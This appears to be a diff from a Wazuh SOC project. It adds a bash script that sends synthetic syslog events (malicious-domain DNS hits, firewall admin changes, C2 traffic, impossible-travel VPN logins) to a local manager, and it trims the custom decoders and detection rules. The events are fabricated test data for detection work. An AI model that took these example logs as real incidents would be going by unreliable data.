+      echo "error: unsupported selector '$1'" >&2
175 
+      return 1
176 
+      ;;
177 
+  esac
178 
+}
179 
+
180 
+emit_syslog() {
181 
+  local line="$1"
182 
+  if [ "${DRY_RUN}" = "1" ]; then
183 
+    echo "DRY_RUN -> ${line}"
184 
+    return 0
185 
+  fi
186 
+
187 
+  if [ "${DOCKER_SEND}" = "1" ]; then
188 
+    if ! printf '%s\n' "${line}" | docker exec -i "${WAZUH_MANAGER_CONTAINER}" bash -lc 'cat > /dev/udp/127.0.0.1/514'; then
189 
+      echo "send_failed target=${WAZUH_MANAGER_CONTAINER}:127.0.0.1:514/udp transport=docker-exec" >&2
190 
+      if [ "${STRICT_SEND}" = "1" ]; then
191 
+        return 1
192 
+      fi
193 
+    fi
194 
+    return 0
195 
+  fi
196 
+
197 
+  if command -v nc >/dev/null 2>&1; then
198 
+    if ! printf '%s\n' "${line}" | nc -w "${NC_WAIT_SECONDS}" -u "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
199 
+      echo "send_failed target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp transport=nc" >&2
200 
+      if [ "${STRICT_SEND}" = "1" ]; then
201 
+        return 1
202 
+      fi
203 
+    fi
204 
+  else
205 
+    if ! printf '%s\n' "${line}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}"; then
206 
+      echo "send_failed target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp transport=devudp" >&2
207 
+      if [ "${STRICT_SEND}" = "1" ]; then
208 
+        return 1
209 
+      fi
210 
+    fi
211 
+  fi
212 
+}
213 
+
214 
+rand_between() {
215 
+  local min max
216 
+  min="$1"
217 
+  max="$2"
218 
+  echo $(( min + RANDOM % (max - min + 1) ))
219 
+}
220 
+
221 
+random_public_ip() {
222 
+  local range last
223 
+  range="$(rand_between 0 2)"
224 
+  last="$(rand_between 2 254)"
225 
+  case "$range" in
226 
+    0) echo "198.51.100.${last}" ;;
227 
+    1) echo "203.0.113.${last}" ;;
228 
+    *) echo "192.0.2.${last}" ;;
229 
+  esac
230 
+}
231 
+
232 
+random_private_ip() {
233 
+  echo "10.$(rand_between 10 30).$(rand_between 1 254).$(rand_between 1 254)"
234 
+}
235 
+
236 
+random_user() {
237 
+  local users=(
238 
+    "admin01" "analyst01" "helpdesk01" "ops.admin" "jane.doe"
239 
+    "svc_backup$" "svc_dbbackup$" "finance.user" "it-admin" "guest"
240 
+  )
241 
+  echo "${users[$((RANDOM % ${#users[@]}))]}"
242 
+}
243 
+
244 
+random_fgt_model() {
245 
+  local models=("FGT40F-Branch01" "FGT60F-Branch01" "FGT80F-Branch01" "FGT501E-DC01")
246 
+  echo "${models[$((RANDOM % ${#models[@]}))]}"
247 
+}
248 
+
249 
+random_devid() {
250 
+  local n
251 
+  n="$(rand_between 10000000 99999999)"
252 
+  echo "FGT80FTK${n}"
253 
+}
254 
+
255 
+random_domain() {
256 
+  echo "ioc-$(rand_between 1000 9999).malicious.example"
257 
+}
258 
+
259 
+replace_kv() {
260 
+  local input key new
261 
+  input="$1"
262 
+  key="$2"
263 
+  new="$3"
264 
+  printf '%s' "$input" | sed -E "s#${key}=\"[^\"]*\"#${key}=\"${new}\"#g; s#${key}=([^\" ][^ ]*)#${key}=${new}#g"
265 
+}
266 
+
267 
+mock_windows_json_line() {
268 
+  local line src_ip
269 
+  line="$1"
270 
+  src_ip="$(random_public_ip)"
271 
+
272 
+  if command -v jq >/dev/null 2>&1; then
273 
+    printf '%s' "$line" | jq -c \
274 
+      --arg srcip "$src_ip" \
275 
+      '
276 
+      if (.win.eventdata | type) == "object" then
277 
+        .win.eventdata |= (
278 
+          if has("subjectUserName") then .subjectUserName = "SYSTEM" else . end |
279 
+          if has("workstationName") then .workstationName = ("WS-" + (($srcip|split("."))[3])) else . end |
280 
+          if has("ipAddress") then .ipAddress = $srcip else . end
281 
+        )
282 
+      else
283 
+        .
284 
+      end
285 
+      ' 2>/dev/null || printf '%s' "$line"
286 
+  else
287 
+    printf '%s' "$line"
288 
+  fi
289 
+}
290 
+
291 
+mock_non_json_line() {
292 
+  local line now_date now_time now_iso epoch src_pub dst_priv prev_pub devname devid query
293 
+  line="$1"
294 
+  now_date="$(date '+%Y-%m-%d')"
295 
+  now_time="$(date '+%H:%M:%S')"
296 
+  now_iso="$(date -u '+%Y-%m-%dT%H:%M:%S.000Z')"
297 
+  epoch="$(date '+%s')"
298 
+  src_pub="$(random_public_ip)"
299 
+  dst_priv="$(random_private_ip)"
300 
+  prev_pub="$(random_public_ip)"
301 
+  devname="$(random_fgt_model)"
302 
+  devid="$(random_devid)"
303 
+  query="$(random_domain)"
304 
+
305 
+  line="$(replace_kv "$line" "date" "$now_date")"
306 
+  line="$(replace_kv "$line" "time" "$now_time")"
307 
+  line="$(replace_kv "$line" "eventtime" "$epoch")"
308 
+  line="$(replace_kv "$line" "devname" "$devname")"
309 
+  line="$(replace_kv "$line" "devid" "$devid")"
310 
+
311 
+  line="$(replace_kv "$line" "srcip" "$src_pub")"
312 
+  line="$(replace_kv "$line" "dstip" "$dst_priv")"
313 
+  line="$(replace_kv "$line" "src_ip" "$src_pub")"
314 
+  line="$(replace_kv "$line" "prev_ip" "$prev_pub")"
315 
+
316 
+  line="$(replace_kv "$line" "query" "$query")"
317 
+
318 
+  line="$(replace_kv "$line" "srcport" "$(rand_between 1025 65535)")"
319 
+  line="$(replace_kv "$line" "distance_km" "$(rand_between 500 16000)")"
320 
+  line="$(replace_kv "$line" "travel_minutes" "$(rand_between 5 180)")"
321 
+
322 
+  if [[ "$line" =~ ^[0-9]{4}-[0-9]{2}-[0-9]{2}T ]]; then
323 
+    line="$(printf '%s' "$line" | sed -E "s#^[0-9]{4}-[0-9]{2}-[0-9]{2}T[^ ]+#${now_iso}#")"
324 
+  fi
325 
+  line="$(printf '%s' "$line" | sed -E "s#from [0-9]{1,3}(\.[0-9]{1,3}){3}#from ${src_pub}#g")"
326 
+  line="$(printf '%s' "$line" | sed -E "s# port [0-9]{2,5}# port $(rand_between 1025 65535)#g")"
327 
+
328 
+  printf '%s' "$line"
329 
+}
330 
+
331 
+mock_line() {
332 
+  local line="$1"
333 
+  if [ "$MOCK_VALUES" != "1" ]; then
334 
+    printf '%s' "$line"
335 
+    return 0
336 
+  fi
337 
+
338 
+  if [[ "$line" =~ ^\{ ]]; then
339 
+    mock_windows_json_line "$line"
340 
+  else
341 
+    mock_non_json_line "$line"
342 
+  fi
343 
+}
344 
+
345 
+send_file_once() {
346 
+  local file selector line sent current_tag extracted
347 
+  file="$1"
348 
+  selector="$2"
349 
+  sent=0
350 
+  current_tag=""
351 
+
352 
+  while IFS= read -r line || [ -n "$line" ]; do
353 
+    if [[ "$line" =~ ^[[:space:]]*#[[:space:]]*([A-Za-z][0-9]-[0-9]{2})([[:space:]]|$) ]]; then
354 
+      extracted="${BASH_REMATCH[1]}"
355 
+      current_tag="$(normalize "$extracted")"
356 
+      continue
357 
+    fi
358 
+
359 
+    if [[ -z "${line// }" ]] || [[ "$line" =~ ^[[:space:]]*# ]]; then
360 
+      continue
361 
+    fi
362 
+
363 
+    if selector_matches_tag "$selector" "$current_tag"; then
364 
+      line="$(mock_line "$line")"
365 
+      emit_syslog "$line"
366 
+      sent=$((sent + 1))
367 
+      sleep "$DELAY"
368 
+    fi
369 
+  done < "$file"
370 
+
371 
+  echo "sent=${sent} file=$(basename "$file") selector=$(normalize "$selector")"
372 
+}
373 
+
374 
+send_guaranteed_hits_once() {
375 
+  local selector sent idx tag line
376 
+  selector="$1"
377 
+  sent=0
378 
+
379 
+  local tags=(
380 
+    "a1-01"
381 
+    "a1-02"
382 
+    "a2-02"
383 
+    "a2-03"
384 
+    "a2-05"
385 
+    "a2-10"
386 
+    "c1-01"
387 
+    "c1-01"
388 
+  )
389 
+
390 
+  local lines=(
391 
+    "soc_event=dns_ioc event_type=ioc_dns_traffic src_ip=10.26.45.214 query=ioc-2294.malicious.example action=blocked severity=medium"
392 
+    "soc_event=dns_ioc event_type=ioc_domain_match src_ip=10.26.45.214 query=bad-c2.example feed=internal_main confidence=high action=alert"
393 
+    "date=2026-03-09 time=10:02:04 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079324 vd=\"root\" logid=\"0100044547\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"password-change\" ui=\"https(10.20.55.1)\""
394 
+    "date=2026-03-09 time=10:02:17 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079337 vd=\"root\" logid=\"0100044548\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"create-admin\" target_user=\"soc-backup-admin\""
395 
+    "date=2026-03-09 time=10:04:03 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079443 vd=\"root\" logid=\"0100044552\" type=\"event\" subtype=\"system\" level=\"notice\" user=\"admin\" action=\"download-config\" dstip=10.20.50.33"
396 
+    "date=2026-03-09 time=10:07:59 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079679 vd=\"root\" logid=\"0000000014\" type=\"traffic\" subtype=\"forward\" level=\"warning\" srcip=10.20.55.50 dstip=203.0.113.60 dstport=443 threat_label=\"known-c2\" action=\"accept\""
397 
+    "date=2026-03-09 time=10:31:00 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773081060 vd=\"root\" logid=\"0101037135\" type=\"event\" subtype=\"vpn\" tunneltype=\"ssl\" action=\"ssl-login-success\" user=\"analyst01\" srcip=203.0.113.71 previous_country=TH current_country=US"
398 
+    "soc_event=correlation event_type=c1_impossible_travel user=\"analyst01\" src_ip=203.0.113.71 prev_ip=203.0.113.11 prev_country=TH current_country=US distance_km=13890 travel_minutes=18"
399 
+  )
400 
+
401 
+  for idx in "${!lines[@]}"; do
402 
+    tag="${tags[$idx]}"
403 
+    if selector_matches_tag "$selector" "$tag"; then
404 
+      line="$(mock_line "${lines[$idx]}")"
405 
+      emit_syslog "$line"
406 
+      sent=$((sent + 1))
407 
+      sleep "$DELAY"
408 
+    fi
409 
+  done
410 
+
411 
+  echo "guaranteed_sent=${sent} selector=$(normalize "$selector")"
412 
+}
413 
+
414 
+EVENT_POOL_READY=0
415 
+EVENT_POOL_SELECTOR=""
416 
+declare -a EVENT_POOL_TAGS
417 
+declare -a EVENT_POOL_LINES
418 
+
419 
+build_event_pool() {
420 
+  local selector file line current_tag extracted idx tag
421 
+  selector="$1"
422 
+  EVENT_POOL_READY=0
423 
+  EVENT_POOL_SELECTOR="$selector"
424 
+  EVENT_POOL_TAGS=()
425 
+  EVENT_POOL_LINES=()
426 
+
427 
+  if [ "$INCLUDE_NONALERTS" = "1" ]; then
428 
+    for file in "${FILES[@]}"; do
429 
+      current_tag=""
430 
+      while IFS= read -r line || [ -n "$line" ]; do
431 
+        if [[ "$line" =~ ^[[:space:]]*#[[:space:]]*([A-Za-z][0-9]-[0-9]{2})([[:space:]]|$) ]]; then
432 
+          extracted="${BASH_REMATCH[1]}"
433 
+          current_tag="$(normalize "$extracted")"
434 
+          continue
435 
+        fi
436 
+        if [[ -z "${line// }" ]] || [[ "$line" =~ ^[[:space:]]*# ]]; then
437 
+          continue
438 
+        fi
439 
+        if selector_matches_tag "$selector" "$current_tag"; then
440 
+          EVENT_POOL_TAGS+=("$current_tag")
441 
+          EVENT_POOL_LINES+=("$line")
442 
+        fi
443 
+      done < "$file"
444 
+    done
445 
+  fi
446 
+
447 
+  if [ "$GUARANTEE_HITS" = "1" ]; then
448 
+    local guaranteed_tags=(
449 
+      "a1-01" "a1-02" "a2-02" "a2-03" "a2-05" "a2-10" "c1-01" "c1-01"
450 
+    )
451 
+    local guaranteed_lines=(
452 
+      "soc_event=dns_ioc event_type=ioc_dns_traffic src_ip=10.26.45.214 query=ioc-2294.malicious.example action=blocked severity=medium"
453 
+      "soc_event=dns_ioc event_type=ioc_domain_match src_ip=10.26.45.214 query=bad-c2.example feed=internal_main confidence=high action=alert"
454 
+      "date=2026-03-09 time=10:02:04 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079324 vd=\"root\" logid=\"0100044547\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"password-change\" ui=\"https(10.20.55.1)\""
455 
+      "date=2026-03-09 time=10:02:17 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079337 vd=\"root\" logid=\"0100044548\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"create-admin\" target_user=\"soc-backup-admin\""
456 
+      "date=2026-03-09 time=10:04:03 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079443 vd=\"root\" logid=\"0100044552\" type=\"event\" subtype=\"system\" level=\"notice\" user=\"admin\" action=\"download-config\" dstip=10.20.50.33"
457 
+      "date=2026-03-09 time=10:07:59 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079679 vd=\"root\" logid=\"0000000014\" type=\"traffic\" subtype=\"forward\" level=\"warning\" srcip=10.20.55.50 dstip=203.0.113.60 dstport=443 threat_label=\"known-c2\" action=\"accept\""
458 
+      "date=2026-03-09 time=10:31:00 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773081060 vd=\"root\" logid=\"0101037135\" type=\"event\" subtype=\"vpn\" tunneltype=\"ssl\" action=\"ssl-login-success\" user=\"analyst01\" srcip=203.0.113.71 previous_country=TH current_country=US"
459 
+      "soc_event=correlation event_type=c1_impossible_travel user=\"analyst01\" src_ip=203.0.113.71 prev_ip=203.0.113.11 prev_country=TH current_country=US distance_km=13890 travel_minutes=18"
460 
+    )
461 
+    for idx in "${!guaranteed_lines[@]}"; do
462 
+      tag="${guaranteed_tags[$idx]}"
463 
+      if selector_matches_tag "$selector" "$tag"; then
464 
+        EVENT_POOL_TAGS+=("$tag")
465 
+        EVENT_POOL_LINES+=("${guaranteed_lines[$idx]}")
466 
+      fi
467 
+    done
468 
+  fi
469 
+
470 
+  EVENT_POOL_READY=1
471 
+}
472 
+
473 
+send_random_event_once() {
474 
+  local selector size idx line tag
475 
+  selector="$1"
476 
+  if [ "$EVENT_POOL_READY" -ne 1 ] || [ "$EVENT_POOL_SELECTOR" != "$selector" ]; then
477 
+    build_event_pool "$selector"
478 
+  fi
479 
+  size="${#EVENT_POOL_LINES[@]}"
480 
+  if [ "$size" -eq 0 ]; then
481 
+    echo "random_sent=0 selector=$(normalize "$selector")"
482 
+    return 0
483 
+  fi
484 
+  idx=$((RANDOM % size))
485 
+  tag="${EVENT_POOL_TAGS[$idx]}"
486 
+  line="${EVENT_POOL_LINES[$idx]}"
487 
+  line="$(mock_line "$line")"
488 
+  emit_syslog "$line"
489 
+  echo "random_sent=1 tag=${tag} selector=$(normalize "$selector")"
490 
+}
491 
+
492 
+if ! is_valid_selector "$SELECTOR"; then
493 
+  echo "error: selector must be one of all|a|b|c|appendix-a|appendix-b|appendix-c|a1..a4|b1..b3|c1..c3|A1-01..C3-04"
494 
+  exit 1
495 
+fi
496 
+
497 
+FILES=()
498 
+while IFS= read -r f; do
499 
+  [ -n "$f" ] && FILES+=("$f")
500 
+done < <(sample_files_for_selector "$SELECTOR")
501 
+
502 
+for f in "${FILES[@]}"; do
503 
+  if [ ! -f "$f" ]; then
504 
+    echo "error: missing sample file '$f'"
505 
+    exit 1
506 
+  fi
507 
+done
508 
+
509 
+echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s forever=${FOREVER} dry_run=${DRY_RUN} mock_values=${MOCK_VALUES} guarantee_hits=${GUARANTEE_HITS} random_types=${RANDOM_TYPES} include_nonalerts=${INCLUDE_NONALERTS} docker_send=${DOCKER_SEND} nc_wait=${NC_WAIT_SECONDS}s strict_send=${STRICT_SEND}"
510 
+echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
511 
+
512 
+if [ "$RANDOM_TYPES" = "1" ]; then
513 
+  if [ "$FOREVER" -eq 1 ]; then
514 
+    loop=1
515 
+    while true; do
516 
+      send_random_event_once "$SELECTOR"
517 
+      echo "loop=${loop} complete"
518 
+      loop=$((loop + 1))
519 
+      sleep "$DELAY"
520 
+    done
521 
+  else
522 
+    for ((i=1; i<=COUNT; i++)); do
523 
+      send_random_event_once "$SELECTOR"
524 
+      echo "iteration=${i}/${COUNT} complete"
525 
+      sleep "$DELAY"
526 
+    done
527 
+  fi
528 
+elif [ "$FOREVER" -eq 1 ]; then
529 
+  loop=1
530 
+  while true; do
531 
+    for f in "${FILES[@]}"; do
532 
+      send_file_once "$f" "$SELECTOR"
533 
+    done
534 
+    if [ "$GUARANTEE_HITS" = "1" ]; then
535 
+      send_guaranteed_hits_once "$SELECTOR"
536 
+    fi
537 
+    echo "loop=${loop} complete"
538 
+    loop=$((loop + 1))
539 
+  done
540 
+else
541 
+  for ((i=1; i<=COUNT; i++)); do
542 
+    for f in "${FILES[@]}"; do
543 
+      send_file_once "$f" "$SELECTOR"
544 
+    done
545 
+    if [ "$GUARANTEE_HITS" = "1" ]; then
546 
+      send_guaranteed_hits_once "$SELECTOR"
547 
+    fi
548 
+    echo "iteration=${i}/${COUNT} complete"
549 
+  done
550 
+fi

+ 0 - 132
scripts/send-wazuh-test-events.sh
ファイルの表示 

@@ -1,132 +0,0 @@
1 
-#!/usr/bin/env bash
2 
-set -euo pipefail
3 
-
4 
-SCENARIO="${1:-all}"
5 
-COUNT="${2:-1}"
6 
-DELAY="${3:-0.3}"
7 
-FOREVER="false"
8 
-
9 
-for arg in "${@:4}"; do
10 
-  case "${arg}" in
11 
-    --forever)
12 
-      FOREVER="true"
13 
-      ;;
14 
-    *)
15 
-      echo "error: unexpected argument '${arg}'"
16 
-      echo "usage: scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
17 
-      exit 1
18 
-      ;;
19 
-  esac
20 
-done
21 
-
22 
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
23 
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
24 
-WAZUH_TEST_SRC_IP="${WAZUH_TEST_SRC_IP:-203.0.113.10}"
25 
-WAZUH_TEST_DOMAIN="${WAZUH_TEST_DOMAIN:-malicious.example}"
26 
-WAZUH_TEST_USER="${WAZUH_TEST_USER:-guest.user}"
27 
-
28 
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
29 
-  echo "error: count must be a positive integer"
30 
-  exit 1
31 
-fi
32 
-
33 
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
34 
-  echo "error: delay must be numeric (example: 0.5)"
35 
-  exit 1
36 
-fi
37 
-
38 
-emit_syslog() {
39 
-  local msg="$1"
40 
-  local sent="false"
41 
-
42 
-  if command -v nc >/dev/null 2>&1; then
43 
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
44 
-      sent="true"
45 
-    fi
46 
-  fi
47 
-
48 
-  if [[ "${sent}" != "true" ]]; then
49 
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
50 
-      sent="true"
51 
-    fi
52 
-  fi
53 
-
54 
-  if [[ "${sent}" != "true" ]]; then
55 
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
56 
-    echo "hint: install netcat or run with bash UDP support (/dev/udp)"
57 
-    return 1
58 
-  fi
59 
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
60 
-}
61 
-
62 
-random_id() {
63 
-  printf "%s" "evt-$(date +%s)-$RANDOM-$RANDOM"
64 
-}
65 
-
66 
-send_ioc_dns() {
67 
-  local eid
68 
-  eid="$(random_id)"
69 
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=ioc_dns src_ip=${WAZUH_TEST_SRC_IP} query=${WAZUH_TEST_DOMAIN} action=blocked severity=medium"
70 
-}
71 
-
72 
-send_ioc_ips() {
73 
-  local eid
74 
-  eid="$(random_id)"
75 
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=ioc_ips src_ip=${WAZUH_TEST_SRC_IP} dst_ip=198.51.100.55 signature='Known C2 Beacon' severity=high"
76 
-}
77 
-
78 
-send_vpn_outside_th() {
79 
-  local eid
80 
-  eid="$(random_id)"
81 
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=vpn_geo_anomaly user=${WAZUH_TEST_USER} src_ip=${WAZUH_TEST_SRC_IP} country=US success=true severity=high"
82 
-}
83 
-
84 
-send_windows_auth_fail() {
85 
-  local eid
86 
-  eid="$(random_id)"
87 
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=windows_auth_fail user=${WAZUH_TEST_USER} src_ip=${WAZUH_TEST_SRC_IP} attempts=7 severity=medium"
88 
-}
89 
-
90 
-send_once() {
91 
-  case "${SCENARIO}" in
92 
-    ioc_dns)
93 
-      send_ioc_dns
94 
-      ;;
95 
-    ioc_ips)
96 
-      send_ioc_ips
97 
-      ;;
98 
-    vpn_outside_th)
99 
-      send_vpn_outside_th
100 
-      ;;
101 
-    windows_auth_fail)
102 
-      send_windows_auth_fail
103 
-      ;;
104 
-    all)
105 
-      send_ioc_dns
106 
-      send_ioc_ips
107 
-      send_vpn_outside_th
108 
-      send_windows_auth_fail
109 
-      ;;
110 
-    *)
111 
-      echo "error: unknown scenario '${SCENARIO}'"
112 
-      echo "valid: ioc_dns | ioc_ips | vpn_outside_th | windows_auth_fail | all"
113 
-      exit 1
114 
-      ;;
115 
-  esac
116 
-}
117 
-
118 
-if [[ "${FOREVER}" == "true" ]]; then
119 
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
120 
-  trap 'echo; echo "stopped"; exit 0' INT TERM
121 
-  while true; do
122 
-    send_once
123 
-    sleep "${DELAY}"
124 
-  done
125 
-else
126 
-  for ((i=1; i<=COUNT; i++)); do
127 
-    send_once
128 
-    if [[ "${i}" -lt "${COUNT}" ]]; then
129 
-      sleep "${DELAY}"
130 
-    fi
131 
-  done
132 
-fi

+ 13 - 21
wazuh-docker/single-node/config/wazuh_cluster/local_decoder.xml
ファイルの表示 

@@ -1,25 +1,17 @@
1 
-<!-- SOC MVP local decoders (minimal production-safe set) -->
1 
+<!--
2 
+  SOC custom decoders (production-focused baseline)
3 
+  - Decodes real correlation payloads produced by SOC Integrator
4 
+  - Decodes real DNS IOC payloads
5 
+-->
2 6
3 
-<decoder name="soc-kv-base">
4 
-  <prematch>soc_mvp_test=true</prematch>
7 
+<decoder name="soc-prod-dns">
8 
+  <prematch>soc_event=dns_ioc</prematch>
9 
+  <regex type="pcre2">event_type=(\S+)(?:.*?src_ip=([\d.]+))?</regex>
10 
+  <order>status, srcip</order>
5 11 
 </decoder>
6 12
7 
-<decoder name="soc-dns-ioc">
8 
-  <parent>soc-kv-base</parent>
9 
-  <prematch>source=dns</prematch>
10 
-</decoder>
11 
-
12 
-<decoder name="soc-vmware-auth">
13 
-  <parent>soc-kv-base</parent>
14 
-  <prematch>source=vmware</prematch>
15 
-</decoder>
16 
-
17 
-<decoder name="soc-log-monitor">
18 
-  <parent>soc-kv-base</parent>
19 
-  <prematch>source=log_monitor</prematch>
20 
-</decoder>
21 
-
22 
-<decoder name="soc-windows-sysmon">
23 
-  <parent>soc-kv-base</parent>
24 
-  <prematch>source=windows_sysmon</prematch>
13 
+<decoder name="soc-prod-integrator">
14 
+  <prematch>soc_event=correlation</prematch>
15 
+  <regex type="pcre2">event_type=(\S+)(?:.*?user="([^"]+)")?(?:.*?src_ip=([\d.]+))?</regex>
16 
+  <order>status, srcuser, srcip</order>
25 17 
 </decoder>

+ 15 - 305
wazuh-docker/single-node/config/wazuh_cluster/local_rules.xml
ファイルの表示 

@@ -1,311 +1,21 @@
1 
-<group name="soc_mvp_test,">
2 
-  <!-- Base marker for all synthetic SOC simulation events -->
3 
-  <rule id="100200" level="3">
4 
-    <match>soc_mvp_test=true</match>
5 
-    <description>SOC MVP synthetic test event detected</description>
6 
-    <group>soc_mvp_test,syslog,</group>
7 
-  </rule>
8 
-
9 
-  <!-- Proposal-level grouping -->
10 
-  <rule id="100210" level="5">
11 
-    <if_sid>100200</if_sid>
12 
-    <match>usecase_id=A</match>
13 
-    <description>Proposal Appendix A simulation event</description>
14 
-    <group>soc_mvp_test,proposal_appendix_a,</group>
15 
-  </rule>
1 
+<!--
2 
+  SOC custom local rules (production-focused baseline)
3 
+  Rule IDs in this file:
4 
+    100250: DNS/IOC decoder anchor (soc-prod-dns)
5 
+    100260: soc-integrator correlation decoder anchor (soc-prod-integrator)
6 
+-->
7 
+<group name="soc_prod_base,">
16 8
17 
-  <rule id="100220" level="5">
18 
-    <if_sid>100200</if_sid>
19 
-    <match>usecase_id=B</match>
20 
-    <description>Proposal Appendix B simulation event</description>
21 
-    <group>soc_mvp_test,proposal_appendix_b,</group>
9 
+  <rule id="100250" level="3">
10 
+    <decoded_as>soc-prod-dns</decoded_as>
11 
+    <description>SOC PROD: DNS/IOC anchor event</description>
12 
+    <group>soc_prod_base,dns_ioc,</group>
22 13 
   </rule>
23 14
24 
-  <rule id="100230" level="5">
25 
-    <if_sid>100200</if_sid>
26 
-    <match>usecase_id=C</match>
27 
-    <description>Proposal Appendix C simulation event</description>
28 
-    <group>soc_mvp_test,proposal_appendix_c,</group>
15 
+  <rule id="100260" level="3">
16 
+    <decoded_as>soc-prod-integrator</decoded_as>
17 
+    <description>SOC PROD: soc-integrator correlation anchor event</description>
18 
+    <group>soc_prod_base,correlation,</group>
29 19 
   </rule>
30 20
31 
-  <!-- Appendix A1 (Medium) -->
32 
-  <rule id="100301" level="8"><if_sid>100210</if_sid><match>usecase_id=A1-01</match><description>A1-01 DNS Network Traffic Communicate to Malicious Domain</description><group>soc_mvp_test,appendix_a,a1,ioc,</group></rule>
33 
-  <rule id="100302" level="8"><if_sid>100210</if_sid><match>usecase_id=A1-02</match><description>A1-02 DNS Network Traffic Malicious Domain IOCs Detection</description><group>soc_mvp_test,appendix_a,a1,ioc,</group></rule>
34 
-
35 
-  <!-- Appendix A2 (FortiGate IPS/IDS & Firewall) -->
36 
-  <rule id="100311" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-01</match><description>A2-01 Allowed RDP from Public IPs</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
37 
-  <rule id="100312" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-02</match><description>A2-02 Firewall Account Admin Password Change</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
38 
-  <rule id="100313" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-03</match><description>A2-03 Firewall Account Create Add Admin Account</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
39 
-  <rule id="100314" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-04</match><description>A2-04 Firewall Configure Disabled Email Notification</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
40 
-  <rule id="100315" level="5"><if_sid>100210</if_sid><match>usecase_id=A2-05</match><description>A2-05 Firewall Configure Download Configure FW</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
41 
-  <rule id="100316" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-06</match><description>A2-06 IDS Alert Multiple Critical High</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
42 
-  <rule id="100317" level="5"><if_sid>100210</if_sid><match>usecase_id=A2-07</match><description>A2-07 Network Traffic Port Scanning</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
43 
-  <rule id="100318" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-08</match><description>A2-08 Network Traffic IOC Detection</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
44 
-  <rule id="100319" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-09</match><description>A2-09 Port Scanning from Private IP</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
45 
-  <rule id="100320" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-10</match><description>A2-10 Communicate to Malicious IP</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
46 
-
47 
-  <!-- Appendix A3 (FortiGate VPN) -->
48 
-  <rule id="100331" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-01</match><description>A3-01 VPN Authentication Success from Guest Account</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
49 
-  <rule id="100332" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-02</match><description>A3-02 VPN Authentication Success from Multiple Country</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
50 
-  <rule id="100333" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-03</match><description>A3-03 VPN Authentication Brute Force Success</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
51 
-  <rule id="100334" level="5"><if_sid>100210</if_sid><match>usecase_id=A3-04</match><description>A3-04 VPN Authentication Multiple Fail Many Accounts from One Source</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
52 
